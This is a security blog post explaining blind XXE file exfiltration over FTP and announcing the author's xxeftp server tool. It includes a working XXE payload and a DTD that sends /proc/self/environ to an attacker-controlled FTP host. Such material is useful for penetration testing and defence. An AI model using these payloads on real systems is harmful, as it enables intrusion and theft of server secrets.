<!DOCTYPE html>
<!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]><html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]><html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--><html class="no-js" prefix="og: http://ogp.me/ns#" xmlns:og="http://ogp.me/ns#"><!--<![endif]-->

    <head>
                <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0" />
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="black">
        <meta name="author" content="">
  
	
        <meta property="og:site_name" content="Staaldraad">
        <meta property="og:title" content="Staaldraad">
        <meta property="og:url" content="https://staaldraad.github.io/2016/12/11/xxeftp/">
        <meta property="og:description" content="">
    
        <meta property="og:type" content="article" />
        <meta property="og:article:author" content="" />
        <meta property="og:article:published_time" content="2016-12-11T17:14:39Z" />
    
        <meta name="generator" content="Hugo 0.48" />
        <title>XXE FTP Server - A {web,ftp}-server for XXE &middot; Staaldraad</title>
        <link rel="canonical" href="https://staaldraad.github.io/" />
        <link rel="alternate" type="application/rss+xml" title="RSS" href="">
        <link rel="stylesheet" type="text/css" href="https://staaldraad.github.io/css/main.css"/>
        <link href="//fonts.googleapis.com/css?family=Source+Sans+Pro:300|Montserrat:700" rel="stylesheet" type="text/css">
        <link href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css" rel="stylesheet">
        <script src="//code.jquery.com/jquery-1.10.2.min.js"></script>
    </head>

<body>
<!--[if lt IE 7]><p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> or <a href="http://www.google.com/chrome/‎">install Google Chrome</a> to experience this site.</p><![endif]-->

    <header id="site-header">
        <div class="container">
            <a href="https://staaldraad.github.io/" alt="Staaldraad"><h1 class="blog-title heading">Staaldraad</h1></a>
            
            <p class="blog-description"></p>
           
            <a href="https://twitter.com/_staaldraad"><span class="icon icon--twitter"><svg viewBox="0 0 16 16" width="16px" height="16px"><path fill="#828282" d="M15.969,3.058c-0.586,0.26-1.217,0.436-1.878,0.515c0.675-0.405,1.194-1.045,1.438-1.809c-0.632,0.375-1.332,0.647-2.076,0.793c-0.596-0.636-1.446-1.033-2.387-1.033c-1.806,0-3.27,1.464-3.27,3.27 c0,0.256,0.029,0.506,0.085,0.745C5.163,5.404,2.753,4.102,1.14,2.124C0.859,2.607,0.698,3.168,0.698,3.767 c0,1.134,0.577,2.135,1.455,2.722C1.616,6.472,1.112,6.325,0.671,6.08c0,0.014,0,0.027,0,0.041c0,1.584,1.127,2.906,2.623,3.206 C3.02,9.402,2.731,9.442,2.433,9.442c-0.211,0-0.416-0.021-0.615-0.059c0.416,1.299,1.624,2.245,3.055,2.271 c-1.119,0.877-2.529,1.4-4.061,1.4c-0.264,0-0.524-0.015-0.78-0.046c1.447,0.928,3.166,1.469,5.013,1.469 c6.015,0,9.304-4.983,9.304-9.304c0-0.142-0.003-0.283-0.009-0.423C14.976,4.29,15.531,3.714,15.969,3.058z"></path></svg>
            </span><span class="username">_staaldraad</span></a>
            <br/>
            <a href="https://github.com/staaldraad"><span class="icon icon--github"><svg viewBox="0 0 16 16" width="16px" height="16px"><path fill="#828282" d="M7.999,0.431c-4.285,0-7.76,3.474-7.76,7.761 c0,3.428,2.223,6.337,5.307,7.363c0.388,0.071,0.53-0.168,0.53-0.374c0-0.184-0.007-0.672-0.01-1.32 c-2.159,0.469-2.614-1.04-2.614-1.04c-0.353-0.896-0.862-1.135-0.862-1.135c-0.705-0.481,0.053-0.472,0.053-0.472 c0.779,0.055,1.189,0.8,1.189,0.8c0.692,1.186,1.816,0.843,2.258,0.645c0.071-0.502,0.271-0.843,0.493-1.037 C4.86,11.425,3.049,10.76,3.049,7.786c0-0.847,0.302-1.54,0.799-2.082C3.768,5.507,3.501,4.718,3.924,3.65 c0,0,0.652-0.209,2.134,0.796C6.677,4.273,7.34,4.187,8,4.184c0.659,0.003,1.323,0.089,1.943,0.261 c1.482-1.004,2.132-0.796,2.132-0.796c0.423,1.068,0.157,1.857,0.077,2.054c0.497,0.542,0.798,1.235,0.798,2.082 c0,2.981-1.814,3.637-3.543,3.829c0.279,0.24,0.527,0.713,0.527,1.437c0,1.037-0.01,1.874-0.01,2.129 c0,0.208,0.14,0.449,0.534,0.373c3.081-1.028,5.302-3.935,5.302-7.362C15.76,3.906,12.285,0.431,7.999,0.431z"></path></svg>
            </span><span class="username">staaldraad</span></a>
        </div>
    </header>
<main class="content" role="main">
	<div class="container">
		<article class="post">
	<header class="post-header">
        <h3 class="p-post-title">XXE FTP Server - A {web,ftp}-server for XXE</h3>
        <p class="post-time"><time datetime="2016-12-11T17:14:39Z">December 11, 2016</time></p>
    </header>

    <section class="post-content">
        

<h2 id="xxe-ftp-oob-basics">XXE - FTP OoB basics</h2>

<p>XXE offers a great attack avenue for reading files from a vulnerable web-app. One of my favourite XXE attacks involves protocol handler abuse, where you use FTP to do an out of band read. This is useful in those cases where you have XXE but it is blind. Unlike the normal OoB retreival through HTTP, FTP works with newer versions of Java (&gt;1.7) and there are fewer characters which break the retrieval. HTTP usually breaks as you either hit an invalid character, such as #, or the URL length is exceeded.</p>

<p>Using FTP to retrieve files through XXE is not new and has been covered in depth in a number of places. The attack looks similar to your HTTP OoB retrieval, except you swith the protocol handler to FTP.</p>

<p>XXE Payload:</p>

<pre><code>&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE a [
&lt;!ENTITY % asd SYSTEM &quot;http://x.x.x.x:4444/ext.dtd&quot;&gt;
%asd;
%c;
]&gt;
&lt;a&gt;&amp;rrr;&lt;/a&gt;
</code></pre>

<p>And the External DTD:</p>

<pre><code>&lt;!ENTITY % d SYSTEM &quot;file:///proc/self/environ&quot;&gt;
&lt;!ENTITY % c &quot;&lt;!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'&gt;&quot;&gt;
</code></pre>

<p>Some more examples of this can be found in my <a href="https://gist.github.com/staaldraad/01415b990939494879b4">XXE gist</a>.</p>

<h2 id="xxe-ftp-server">XXE FTP Server</h2>

<p>One of the irritations I first ran into when doing this form of XXE was setting up the FTP server. Sure you can have a netcat listener that receives the connection and then you clean up the data, but how about a nice all in one solution? For this I wrote <a href="https://github.com/staaldraad/xxeserv">xxeftp</a>, which sets up a custom FTP server which will receive our payload, extract the data being sent, and return the original version of the file. Quick, clean and easy.</p>

<p>Another irritation encountered in the past has been servers that can only connect out on one port (80 or 443), meaning we need to setup multiple hosts for our XXE attack. One to serve our external DTD and one to receive the FTP payload. To simplify this, I decided to build a &ldquo;magic&rdquo; protocol decode into xxeftp. What this means is that it&rsquo;s possible to serve HTTP, HTTPS and FTP on a single port. Now you need one host, with one port and your attack can proceed as normal.</p>

<p>To make this work, you simply need to use xxeftp with the &ldquo;uno port&rdquo; option, <code>-uno &lt;port&gt;</code> , which will setup our multi-listener on the specified port. When a connection is received, the first few bytes will be examined. If the first byte is 0x22, we have  a TLS connection, if 0x71, it&rsquo;s HTTP, otherwise treat it as FTP.</p>

<h3 id="usage">Usage</h3>

<p>Usage is super basic,</p>

<pre><code>Usage of ./xxeftp:
  -o string
    	File location to log to
  -p int
    	Port to listen on (default 2121)
  -uno int
    	Global port to listen on (default 5000)
  -w	Setup web-server for DTDs
  -wd string
    	Folder to server DTD(s) from (default &quot;./&quot;)
  -wp int
    	Port to serve DTD on (default 2122)
  -wps int
    	SSL Port to serve DTD on (default 2123)
</code></pre>

<p>The server will automatically generate TLS certificates for the connection if none exist in the web-server directory. Alternatively create cert.pem and key.pem in the web-server directory.</p>

<pre><code>sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555
</code></pre>

<p>This will setup the server to listen globally on port 443, create a webserver on port 2122, HTTPS web-server on port 2123 and an FTP server on port 2121. If connections come into port 443, it will internally forward the traffic to the correct port/service. Alternatively you can directly send traffic to the desired port.</p>

<p>Have phun,</p>

    </section>

    <hr>

    <footer class="post-footer">
        <section class="f-1">
            
            
            <p class="f-post-time"><time datetime="2016-12-11T17:14:39Z">December 11, 2016</time></p>
        </section>
                        
        <section class="f-2">
            <section class="share">
                <span>Share:
                <a class="icon-twitter" href="http://twitter.com/share?text=XXE%20FTP%20Server%20-%20A%20%7bweb%2cftp%7d-server%20for%20XXE&url=https%3a%2f%2fstaaldraad.github.io%2f2016%2f12%2f11%2fxxeftp%2f"
                    onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;">
                    <i class="fa fa-twitter"></i>
                </a>
                <a class="icon-facebook" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2fstaaldraad.github.io%2f2016%2f12%2f11%2fxxeftp%2f"
                    onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;">
                    <i class="fa fa-facebook"></i>
                </a>
                <a class="icon-google-plus" href="https://plus.google.com/share?url=https%3a%2f%2fstaaldraad.github.io%2f2016%2f12%2f11%2fxxeftp%2f"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;">
                    <i class="fa fa-google-plus"></i>
                </a>
                </span>
            </section>

            
        </section>
                        
    </footer>
</article>
	</div>
</main>
    <footer id="site-footer">
        <div class="container">
          
          
          
          
          <a href="https://staaldraad.github.io/index.xml" title="Get the RSS feed"><span class="tooltip"><i class="fa fa-rss"></i></span></a>
          <section>&copy; <a href="https://staaldraad.github.io/"></a> 2018 | All rights reserved</section>
          <section>Theme by <a href="http://www.jrdnbwmn.com">Jordan Bowman</a>. Generated with <a href="http://gohugo.io/">Hugo</a>.</section>
        </div>
    </footer>

    <script type="text/javascript" src="https://staaldraad.github.io/js/fittext.js"></script>
    <script type="text/javascript">
      $(".heading").fitText();
    </script>



</body>
</html>